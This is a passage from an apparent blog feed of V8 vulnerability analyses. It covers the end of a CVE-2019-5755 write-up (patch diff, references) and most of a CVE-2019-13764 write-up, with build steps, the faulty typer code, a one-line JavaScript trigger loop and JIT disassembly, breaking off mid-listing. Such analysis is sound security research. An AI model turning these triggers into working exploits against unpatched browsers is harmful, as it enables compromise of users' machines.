a Smi or Int32 feedback, the representation selection will</span><br><span class="line">  // either truncate or it will check the inputs (i.e., deopt if not int32).</span><br><span class="line">  // In either case the result will be in the safe integer range, so we</span><br><span class="line">  // can bake in the type here. This needs to be in sync with</span><br><span class="line">  // SimplifiedLowering::VisitSpeculativeAdditiveOp.</span><br><span class="line"><span class="deletion">-  return result = Type::Intersect(result, cache_.kSafeInteger, zone());</span></span><br><span class="line"><span class="addition">+  return Type::Intersect(result, cache_.kSafeIntegerOrMinusZero, zone());</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">void VisitSpeculativeIntegerAdditiveOp(Node* node, Truncation truncation,</span><br><span class="line">                                         SimplifiedLowering* lowering) &#123;</span><br><span class="line">   // ...</span><br><span 
class="line">   </span><br><span class="line">   Type left_feedback_type = TypeOf(node-&gt;InputAt(0));</span><br><span class="line">     Type right_feedback_type = TypeOf(node-&gt;InputAt(1));</span><br><span class="line">     // Handle the case when no int32 checks on inputs are necessary (but</span><br><span class="line">     // an overflow check is needed on the output). Note that we do not</span><br><span class="line"><span class="deletion">-    // have to do any check if at most one side can be minus zero.</span></span><br><span class="line"><span class="deletion">-    if (left_upper.Is(Type::Signed32OrMinusZero()) &amp;&amp;</span></span><br><span class="line"><span class="addition">+    // have to do any check if at most one side can be minus zero. For</span></span><br><span class="line"><span class="addition">+    // subtraction we need to handle the case of -0 - 0 properly, since</span></span><br><span class="line"><span class="addition">+    // that can produce -0.</span></span><br><span class="line"><span class="addition">+    Type left_constraint_type =</span></span><br><span class="line"><span class="addition">+        node-&gt;opcode() == IrOpcode::kSpeculativeSafeIntegerAdd</span></span><br><span class="line"><span class="addition">+            ? 
Type::Signed32OrMinusZero()</span></span><br><span class="line"><span class="addition">+            : Type::Signed32();</span></span><br><span class="line"><span class="addition">+    if (left_upper.Is(left_constraint_type) &amp;&amp;</span></span><br><span class="line">         right_upper.Is(Type::Signed32OrMinusZero()) &amp;&amp;</span><br><span class="line">         (left_upper.Is(Type::Signed32()) || right_upper.Is(Type::Signed32()))) &#123;</span><br><span class="line">       VisitBinop(node, UseInfo::TruncatingWord32(),</span><br><span class="line">                 MachineRepresentation::kWord32, Type::Signed32());</span><br><span class="line">     &#125; else &#123;</span><br><span class="line">     // ...</span><br><span class="line">     &#125;</span><br><span class="line">     // ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>With the patch applied, the turbolizer view for the original PoC is:</p><p><img src="/2021/02/CVE-2019-5755/patched_turbolizer.png" alt="img"></p><p>The Type of SpeculativeSafeIntegerSubtract now includes MinusZero, so the SameValue node below it is no longer fixed to false; its type is the <strong>undetermined</strong> Boolean.</p></li></ul><h2 id="六、参考">6. References</h2><ul><li><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=913296">Issue 913296: Security: V8: Incorrect type information on SpeculativeSafeIntegerSubtract</a></li><li><a href="https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/">Exploiting the Math.expm1 typing bug in V8 - 0x41414141 in ??()</a></li><li><a href="https://www.jfokus.se/jfokus18/preso/Escape-Analysis-in-V8.pdf">Escape-Analysis-in-V8</a></li><li><a href="https://cy2cs.top/2020/05/07/v8-math-expm1-%e7%b1%bb%e5%9e%8b%e9%94%99%e8%af%af%e5%af%bc%e8%87%b4%e7%9a%84%e6%bc%8f%e6%b4%9e/">v8-math-expm1-类型错误导致的漏洞</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;1. Preface&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2019-5755 is a missing-type-information bug in the TurboFan compiler of v8. The type computed for SpeculativeSafeIntegerSubtract omits MinusZero (that is, -0). As a result TurboFan can compute a wrong Range, which can be developed into out-of-bounds read/write primitives and even shellcode execution.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The v8 version used for reproduction is &lt;code&gt;7.1.302.28&lt;/code&gt; (any version before commit &lt;code&gt;a62e9dd69957d9b1d0a56f825506408960a283fc&lt;/code&gt; also works).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2019-13764 Analysis</title>
    <link href="https://kiprey.github.io/2021/02/CVE-2019-13764/"/>
    <id>https://kiprey.github.io/2021/02/CVE-2019-13764/</id>
    <published>2021-02-10T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.750Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">I. Preface</h2><ul><li><p>CVE-2019-13764 is a V8 vulnerability in the <code>TypeInductionVariablePhi</code> function of the JIT TyperPhase. It is a compact example for studying how TyperPhase handles InductionVariablePhi nodes and how an out-of-bounds read can be constructed.</p></li><li><p>The V8 version used for reproduction is <code>7.8.279.23</code> (chromium 78.0.3904.108).</p></li></ul><span id="more"></span><h2 id="二、环境搭建">II. Environment Setup</h2><ul><li><p>Check out the target V8 version and build it:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">git checkout 7.8.279.23</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line">ninja -C out.gn/x64.debug  </span><br></pre></td></tr></table></figure></li><li><p>Start turbolizer. If the turbolizer bundled with this version does not work, use the online <a href="https://v8.github.io/tools/head/turbolizer/index.html">turbolizer</a> instead.</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">cd</span> tools/turbolizer</span><br><span class="line">npm i</span><br><span class="line">npm run-script build</span><br><span class="line">python -m SimpleHTTPServer 8000&amp;</span><br><span class="line">google-chrome http://127.0.0.1:8000</span><br></pre></td></tr></table></figure></li></ul><h2 id="三、漏洞细节">III. Vulnerability Details</h2><ul><li><p>During induction-variable analysis, combining initial_type with increment_type can add two infinities of opposite sign and produce NaN (<strong>-inf + inf == NaN</strong>). Execution then <strong>reaches code that TurboFan considers unreachable</strong> and crashes with SIGTRAP.</p></li><li><p>The vulnerable function is shown below:</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeInductionVariablePhi</span>(Node* node) &#123;</span><br><span class="line">  <span class="type">int</span> arity = NodeProperties::<span class="built_in">GetControlInput</span>(node)-&gt;<span class="built_in">op</span>()-&gt;<span 
class="built_in">ControlInputCount</span>();</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(IrOpcode::kLoop, NodeProperties::<span class="built_in">GetControlInput</span>(node)-&gt;<span class="built_in">opcode</span>());</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(<span class="number">2</span>, NodeProperties::<span class="built_in">GetControlInput</span>(node)-&gt;<span class="built_in">InputCount</span>());</span><br><span class="line"></span><br><span class="line">  Type initial_type = <span class="built_in">Operand</span>(node, <span class="number">0</span>);</span><br><span class="line">  Type increment_type = <span class="built_in">Operand</span>(node, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// We only handle integer induction variables (otherwise ranges</span></span><br><span class="line">  <span class="comment">// do not apply and we cannot do anything).</span></span><br><span class="line">  <span class="comment">// Check whether initial_type &amp;&amp; increment_type are both integer types</span></span><br><span class="line">  <span class="keyword">if</span> (!initial_type.<span class="built_in">Is</span>(typer_-&gt;cache_-&gt;kInteger) ||</span><br><span class="line">      !increment_type.<span class="built_in">Is</span>(typer_-&gt;cache_-&gt;kInteger)) &#123;</span><br><span class="line">    <span class="comment">// Fallback to normal phi typing, but ensure monotonicity.</span></span><br><span class="line">    <span class="comment">// (Unfortunately, without baking in the previous type, monotonicity might</span></span><br><span class="line">    <span class="comment">// be violated because we might not yet have retyped the incrementing</span></span><br><span class="line">    <span class="comment">// operation even though the increment&#x27;s type might been already reflected</span></span><br><span class="line">    <span class="comment">// in the 
induction variable phi.)</span></span><br><span class="line">    <span class="comment">// If the check fails, fall back to the conservative phi typer.</span></span><br><span class="line">    Type type = NodeProperties::<span class="built_in">IsTyped</span>(node) ? NodeProperties::<span class="built_in">GetType</span>(node)</span><br><span class="line">                                              : Type::<span class="built_in">None</span>();</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; arity; ++i) &#123;</span><br><span class="line">      type = Type::<span class="built_in">Union</span>(type, <span class="built_in">Operand</span>(node, i), <span class="built_in">zone</span>());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> type;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Now process the bounds.</span></span><br><span class="line">  <span class="comment">// Process the bounds to obtain the final min and max.</span></span><br><span class="line">  <span class="keyword">auto</span> res = induction_vars_-&gt;<span class="built_in">induction_variables</span>().<span class="built_in">find</span>(node-&gt;<span class="built_in">id</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(res != induction_vars_-&gt;<span class="built_in">induction_variables</span>().<span class="built_in">end</span>());</span><br><span class="line">  InductionVariable* induction_var = res-&gt;second;</span><br><span class="line"></span><br><span class="line">  InductionVariable::ArithmeticType arithmetic_type = induction_var-&gt;<span class="built_in">Type</span>();</span><br><span class="line">    </span><br><span class="line">  <span class="type">double</span> min = -V8_INFINITY;</span><br><span class="line">  <span 
class="type">double</span> max = V8_INFINITY;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Compute the actual min and max.</span></span><br><span class="line"><span class="comment">     Specifically:</span></span><br><span class="line"><span class="comment">     1. For an increasing loop (increment_min &gt;= 0):</span></span><br><span class="line"><span class="comment">      - min = initial_type.Min();</span></span><br><span class="line"><span class="comment">      - max = std::min(max, bound_max + increment_max);</span></span><br><span class="line"><span class="comment">        max = std::max(max, initial_type.Max());   </span></span><br><span class="line"><span class="comment">     2. For a decreasing loop (increment_max &lt;= 0):</span></span><br><span class="line"><span class="comment">      - max = initial_type.Max();</span></span><br><span class="line"><span class="comment">      - min = std::max(min, bound_min + increment_min);</span></span><br><span class="line"><span class="comment">        min = std::min(min, initial_type.Min());</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Range</span>(min, max, typer_-&gt;<span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The code above only checks whether initial_type and increment_type are both Integer and falls back to the conservative typer otherwise. It never considers that the addition may yield NaN, so certain test cases are typed incorrectly.</p></li><li><p>Consider a loop whose initial value is <strong>infinity</strong> and whose increment is <strong>-infinity</strong>, such as:</p><figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="title class_">Infinity</span>; a &gt;= <span class="number">1</span>; a += (-<span 
class="title class_">Infinity</span>)) &#123;&#125;</span><br></pre></td></tr></table></figure><p>When the phi node of the induction variable a is typed for this loop, both initial_type and increment_type are integer types, so the function does not fall back to the conservative typer and keeps going. It then proceeds as follows until the return statement, which assigns the range <code>-inf ~ inf</code> to the current InductionVariablePhi node:</p><blockquote><p>The details are given as comments in the code.</p></blockquote><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeInductionVariablePhi</span>(Node* node) &#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// [1]. Initially set min and max to the two extremes</span></span><br><span class="line">  <span class="type">double</span> min = -V8_INFINITY;</span><br><span class="line">  <span class="type">double</span> max = V8_INFINITY;</span><br><span class="line">  <span class="type">double</span> increment_min;</span><br><span class="line">  <span class="type">double</span> increment_max;</span><br><span class="line">  <span class="keyword">if</span> (arithmetic_type == InductionVariable::ArithmeticType::kAddition) &#123;</span><br><span class="line">    <span class="comment">// [2]. 
The induction variable in the JS code is updated by addition, i.e. `a += (-Infinity)`, so control flow enters this branch</span></span><br><span class="line">    increment_min = increment_type.<span class="built_in">Min</span>();</span><br><span class="line">    increment_max = increment_type.<span class="built_in">Max</span>();</span><br><span class="line">    <span class="comment">// Here increment_min == increment_max == -inf</span></span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">DCHECK_EQ</span>(InductionVariable::ArithmeticType::kSubtraction, arithmetic_type);</span><br><span class="line">    increment_min = -increment_type.<span class="built_in">Max</span>();</span><br><span class="line">    increment_max = -increment_type.<span class="built_in">Min</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (increment_min &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (increment_max &lt;= <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// [3]. increment_max == -inf, so this branch is taken</span></span><br><span class="line">    <span class="comment">// decreasing sequence</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">// Take the maximum for this branch; max is not modified again below</span></span><br><span class="line">    <span class="comment">// Here max == inf</span></span><br><span class="line">    max = initial_type.<span class="built_in">Max</span>();</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> bound : induction_var-&gt;<span class="built_in">lower_bounds</span>()) &#123;</span><br><span class="line">      <span class="comment">// [4]. 
For each comparison in the loop condition, get the type and value of the bound</span></span><br><span class="line">      Type bound_type = <span class="built_in">TypeOrNone</span>(bound.bound);</span><br><span class="line">      <span class="comment">// If the type is not an integer, just skip the bound.</span></span><br><span class="line">      <span class="keyword">if</span> (!bound_type.<span class="built_in">Is</span>(typer_-&gt;cache_-&gt;kInteger)) <span class="keyword">continue</span>;</span><br><span class="line">      <span class="comment">// If the type is not inhabited, then we can take the initial value.</span></span><br><span class="line">      <span class="keyword">if</span> (bound_type.<span class="built_in">IsNone</span>()) &#123;</span><br><span class="line">        min = initial_type.<span class="built_in">Min</span>();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// For the example above, bound_min == bound_max == 1</span></span><br><span class="line">      <span class="type">double</span> bound_min = bound_type.<span class="built_in">Min</span>();</span><br><span class="line">      <span class="keyword">if</span> (bound.kind == InductionVariable::kStrict) &#123;</span><br><span class="line">        bound_min += <span class="number">1</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// Update min: both arguments to std::max are -inf here (1 + -inf == -inf), so min stays -inf</span></span><br><span class="line">      min = std::<span class="built_in">max</span>(min, bound_min + increment_min);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// The lower bound must be at most the initial value&#x27;s lower bound.</span></span><br><span class="line">    <span class="comment">// [5]. 
-inf &lt; inf, so min is set to -inf again</span></span><br><span class="line">    min = std::<span class="built_in">min</span>(min, initial_type.<span class="built_in">Min</span>());</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">// Shortcut: If the increment can be both positive and negative,</span></span><br><span class="line">    <span class="comment">// the variable can go arbitrarily far, so just return integer.</span></span><br><span class="line">    <span class="keyword">return</span> typer_-&gt;cache_-&gt;kInteger;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// [6]. Returns Range(-inf, inf), which is an incorrect range</span></span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Range</span>(min, max, typer_-&gt;<span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>At the assignments to min (that is, [4] and [5]), the original code expects <strong>min to lie in the range</strong></p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line">initial_type.Min &lt;= min &lt;= bound_min + increment_type.Min</span><br></pre></td></tr></table></figure><p>However, since <strong>initial_type.Min == inf and increment_type.Min == -inf</strong>, min evolves along the following chain:</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line">-<span class="built_in">inf</span>(initial value) =&gt; -<span class="built_in">inf</span>(bound_min+increment_min) =&gt; -<span class="built_in">inf</span>(result of comparing with the initial value)</span><br></pre></td></tr></table></figure><p>so the final min is -inf.</p></li><li><p>The incorrect Range on the Phi node propagates incorrect types, which makes it very easy for control flow to end up in the deopt path. The int3 breakpoint triggered by this bug lies inside the deopt section of the generated JIT code. Because TurboFan propagated incorrect types, the deopt code cannot identify the deopt function it should call, so control flow gets stuck in an infinite loop and repeatedly hits an int3 breakpoint that should never be reached.</p><p>Below is the assembly generated by TurboFan's first compilation:</p><figure class="highlight x86asm"><table><tr><td class="code"><pre><span class="line"><span class="number">0x118a80d82e20</span>     <span class="number">0</span>  488d1df9ffffff       REX<span class="number">.</span>W leaq <span class="built_in">rbx</span>,[<span class="built_in">rip</span>+<span class="number">0xfffffff9</span>]</span><br><span class="line"><span class="number">0x118a80d82e27</span>     <span class="number">7</span>  483bd9               REX<span class="number">.</span>W cmpq <span class="built_in">rbx</span>,<span class="built_in">rcx</span></span><br><span class="line"><span class="number">0x118a80d82e2a</span>     a  <span class="number">7418</span>                 <span class="keyword">jz</span> <span class="number">0x118a80d82e44</span>  &lt;+<span class="number">0x24</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e2c</span>     c  48ba0000000036000000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,<span class="number">0x3600000000</span></span><br><span class="line"><span class="number">0x118a80d82e36</span>    <span class="number">16</span>  49ba803d5202157f0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,<span class="number">0x7f1502523d80</span>  (Abort)    <span class="comment">;; 
off heap target</span></span><br><span class="line"><span class="number">0x118a80d82e40</span>    <span class="number">20</span>  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82e43</span>    <span class="number">23</span>  cc                   int3l</span><br><span class="line"><span class="number">0x118a80d82e44</span>    <span class="number">24</span>  488b59e0             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rbx</span>,[<span class="built_in">rcx</span>-<span class="number">0x20</span>]</span><br><span class="line"><span class="number">0x118a80d82e48</span>    <span class="number">28</span>  f6430f01             testb [<span class="built_in">rbx</span>+<span class="number">0xf</span>],<span class="number">0x1</span></span><br><span class="line"><span class="number">0x118a80d82e4c</span>    2c  <span class="number">740d</span>                 <span class="keyword">jz</span> <span class="number">0x118a80d82e5b</span>  &lt;+<span class="number">0x3b</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e4e</span>    2e  49bac0914602157f0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,<span class="number">0x7f15024691c0</span>  (CompileLazyDeoptimizedCode)    <span class="comment">;; off heap target</span></span><br><span class="line"><span class="number">0x118a80d82e58</span>    <span class="number">38</span>  41ffe2               <span class="keyword">jmp</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82e5b</span>    3b  <span class="number">55</span>                   <span class="keyword">push</span> <span class="built_in">rbp</span></span><br><span class="line"><span class="number">0x118a80d82e5c</span>    3c  4889e5               REX<span class="number">.</span>W <span 
class="keyword">movq</span> <span class="built_in">rbp</span>,<span class="built_in">rsp</span></span><br><span class="line"><span class="number">0x118a80d82e5f</span>    3f  <span class="number">56</span>                   <span class="keyword">push</span> <span class="built_in">rsi</span></span><br><span class="line"><span class="number">0x118a80d82e60</span>    <span class="number">40</span>  <span class="number">57</span>                   <span class="keyword">push</span> <span class="built_in">rdi</span></span><br><span class="line"><span class="number">0x118a80d82e61</span>    <span class="number">41</span>  48ba0000000022000000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,<span class="number">0x2200000000</span></span><br><span class="line"><span class="number">0x118a80d82e6b</span>    4b  4c8b15c6ffffff       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,[<span class="built_in">rip</span>+<span class="number">0xffffffc6</span>]</span><br><span class="line"><span class="number">0x118a80d82e72</span>    <span class="number">52</span>  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82e75</span>    <span class="number">55</span>  cc                   int3l</span><br><span class="line">---------------------------------------- Main Code ------------------------------------------------</span><br><span class="line"><span class="number">0x118a80d82e76</span>    <span class="number">56</span>  4883ec08             REX<span class="number">.</span>W subq <span class="built_in">rsp</span>,<span class="number">0x8</span></span><br><span class="line"><span class="number">0x118a80d82e7a</span>    5a  488975b0             REX<span class="number">.</span>W <span class="keyword">movq</span> [<span class="built_in">rbp</span>-<span class="number">0x50</span>],<span 
class="built_in">rsi</span></span><br><span class="line"><span class="number">0x118a80d82e7e</span>    5e  488b55d8             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,[<span class="built_in">rbp</span>-<span class="number">0x28</span>]</span><br><span class="line"><span class="number">0x118a80d82e82</span>    <span class="number">62</span>  f6c201               testb <span class="built_in">rdx</span>,<span class="number">0x1</span></span><br><span class="line"><span class="number">0x118a80d82e85</span>    <span class="number">65</span>  0f859a000000         <span class="keyword">jnz</span> <span class="number">0x118a80d82f25</span>  &lt;+<span class="number">0x105</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e8b</span>    6b  48b90000000010270000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rcx</span>,<span class="number">0x271000000000</span></span><br><span class="line"><span class="number">0x118a80d82e95</span>    <span class="number">75</span>  483bd1               REX<span class="number">.</span>W cmpq <span class="built_in">rdx</span>,<span class="built_in">rcx</span></span><br><span class="line"><span class="number">0x118a80d82e98</span>    <span class="number">78</span>  0f8c0b000000         <span class="keyword">jl</span> <span class="number">0x118a80d82ea9</span>  &lt;+<span class="number">0x89</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e9e</span>    7e  498b4520             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rax</span>,[<span class="built_in">r13</span>+<span class="number">0x20</span>] (root (undefined_value))</span><br><span class="line"><span class="number">0x118a80d82ea2</span>    <span class="number">82</span>  488be5               REX<span class="number">.</span>W <span class="keyword">movq</span> <span 
class="built_in">rsp</span>,<span class="built_in">rbp</span></span><br><span class="line"><span class="number">0x118a80d82ea5</span>    <span class="number">85</span>  <span class="number">5d</span>                   <span class="keyword">pop</span> <span class="built_in">rbp</span></span><br><span class="line"><span class="number">0x118a80d82ea6</span>    <span class="number">86</span>  c20800               <span class="keyword">ret</span> <span class="number">0x8</span></span><br><span class="line">---------------------------------------- Deopt Code ---------------------------------------------</span><br><span class="line"><span class="number">0x118a80d82ea9</span>    <span class="number">89</span>  493b65e0             REX<span class="number">.</span>W cmpq <span class="built_in">rsp</span>,[<span class="built_in">r13</span>-<span class="number">0x20</span>] (external value (StackGuard::address_of_jslimit()))</span><br><span class="line"><span class="number">0x118a80d82ead</span>    <span class="number">8d</span>  0f8629000000         <span class="keyword">jna</span> <span class="number">0x118a80d82edc</span>  &lt;+<span class="number">0xbc</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82eb3</span>    <span class="number">93</span>  48b979fa19a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rcx</span>,<span class="number">0x2d63a619fa79</span>    <span class="comment">;; object: 0x2d63a619fa79  the loop starts here</span></span><br><span class="line"><span class="number">0x118a80d82ebd</span>    <span class="number">9d</span>  48bf39d619a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdi</span>,<span class="number">0x2d63a619d639</span>    <span class="comment">;; object: 0x2d63a619d639  value=0x2d63a619fa79 &gt;</span></span><br><span class="line"><span class="number">0x118a80d82ec7</span>    a7  48394f17             REX<span 
class="number">.</span>W cmpq [<span class="built_in">rdi</span>+<span class="number">0x17</span>],<span class="built_in">rcx</span></span><br><span class="line"><span class="number">0x118a80d82ecb</span>    ab  0f8560000000         <span class="keyword">jnz</span> <span class="number">0x118a80d82f31</span>  &lt;+<span class="number">0x111</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82ed1</span>    b1  493b65e0             REX<span class="number">.</span>W cmpq <span class="built_in">rsp</span>,[<span class="built_in">r13</span>-<span class="number">0x20</span>] (external value (StackGuard::address_of_jslimit()))</span><br><span class="line"><span class="number">0x118a80d82ed5</span>    b5  0f862a000000         <span class="keyword">jna</span> <span class="number">0x118a80d82f05</span>  &lt;+<span class="number">0xe5</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82edb</span>    bb  cc                   int3l                            <span class="comment">;; none of the loop-exit conditions in this code are ever met, so this breakpoint is hit repeatedly</span></span><br><span class="line"><span class="number">0x118a80d82edc</span>    bc  48bb307ba501157f0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rbx</span>,<span class="number">0x7f1501a57b30</span>    <span class="comment">;; external reference (Runtime::StackGuard)</span></span><br><span class="line"><span class="number">0x118a80d82ee6</span>    c6  33c0                 xorl <span class="built_in">rax</span>,<span class="built_in">rax</span></span><br><span class="line"><span class="number">0x118a80d82ee8</span>    c8  48be311818a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rsi</span>,<span class="number">0x2d63a6181831</span>    <span class="comment">;; object: 0x2d63a6181831 </span></span><br><span class="line"><span class="number">0x118a80d82ef2</span>    d2  49baa0de7302157f0000 REX<span class="number">.</span>W 
<span class="keyword">movq</span> <span class="built_in">r10</span>,<span class="number">0x7f150273dea0</span>  (CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit)    <span class="comment">;; off heap target</span></span><br><span class="line"><span class="number">0x118a80d82efc</span>    dc  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82eff</span>    df  488b55d8             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,[<span class="built_in">rbp</span>-<span class="number">0x28</span>]</span><br><span class="line"><span class="number">0x118a80d82f03</span>    e3  ebae                 <span class="keyword">jmp</span> <span class="number">0x118a80d82eb3</span>  &lt;+<span class="number">0x93</span>&gt;      <span class="comment">;; 跳转回上面的代码</span></span><br><span class="line"><span class="number">0x118a80d82f05</span>    e5  488b1dd2ffffff       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rbx</span>,[<span class="built_in">rip</span>+<span class="number">0xffffffd2</span>]</span><br><span class="line"><span class="number">0x118a80d82f0c</span>    ec  33c0                 xorl <span class="built_in">rax</span>,<span class="built_in">rax</span></span><br><span class="line"><span class="number">0x118a80d82f0e</span>    ee  48be311818a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rsi</span>,<span class="number">0x2d63a6181831</span>    <span class="comment">;; object: 0x2d63a6181831 </span></span><br><span class="line"><span class="number">0x118a80d82f18</span>    f8  4c8b15d5ffffff REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,[<span class="built_in">rip</span>+<span class="number">0xffffffd5</span>]</span><br><span class="line"><span 
class="number">0x118a80d82f1f</span>    ff  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82f22</span>   <span class="number">102</span>  ebb7                 <span class="keyword">jmp</span> <span class="number">0x118a80d82edb</span>  &lt;+<span class="number">0xbb</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82f24</span>   <span class="number">104</span>  <span class="number">90</span>                   <span class="keyword">nop</span></span><br><span class="line"><span class="number">0x118a80d82f25</span>   <span class="number">105</span>  49c7c500000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x0</span>      <span class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;170&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;-1&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;not a Smi&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 0</span></span><br><span class="line"><span class="number">0x118a80d82f2c</span>   10c  e80ff10300           <span class="keyword">call</span> <span class="number">0x118a80dc2040</span>     <span class="comment">;; eager deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f31</span>   <span class="number">111</span>  49c7c501000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x1</span>      <span 
